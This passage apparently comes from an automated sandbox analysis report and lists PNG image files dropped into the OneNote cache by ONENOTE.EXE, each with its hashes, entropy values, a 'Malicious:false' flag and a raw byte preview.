                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
